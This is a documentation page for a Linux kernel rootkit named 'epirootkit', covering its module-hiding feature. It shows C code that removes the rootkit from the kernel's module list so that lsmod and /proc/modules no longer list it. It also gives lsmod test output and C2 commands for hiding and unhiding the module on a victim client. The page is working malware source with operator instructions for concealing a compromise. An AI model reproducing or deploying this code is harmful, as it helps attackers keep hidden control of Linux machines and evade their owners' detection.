On this page

Module Hiding

Hide the rootkit module from lsmod and /proc/modules

Module Hiding

Hide the rootkit module from lsmod and /proc/modules by removing it from the kernel’s module list.

Implementation

  int hide_module(void)
{
    if (module_hiding_state.hidden)
        return 0;

    module_hiding_state.prev_module_entry = THIS_MODULE->list.prev;
    list_del(&THIS_MODULE->list);
    module_hiding_state.hidden = true;
    
    return 0;
}

Removes the module from kernel’s linked list using list_del() while saving the previous entry for restoration.

warning

The Line Hiding also hides the module from /proc/modules so to test module visibility with lsmod, you must disable line hiding.

Testing

  # Before hiding
lsmod | grep epirootkit
# Output: epirootkit    16384  0

# After hiding  
lsmod | grep epirootkit
# Output: (nothing)

Control

WebUI

Toggle via Configuration Panel

C2 Commands

  hide-module Client-1      # Hide module
unhide-module Client-1    # Make visible
status Client-1           # Check state

Module remains fully functional while hidden.

Edit this page

Sysfs Interface

Linux permissions-based …

File Hiding

Hide files and directories …

Module Hiding

Module Hiding link

Implementation link

Testing link

Control link

WebUI link

C2 Commands link

Module Hiding

Implementation

Testing

Control

WebUI

C2 Commands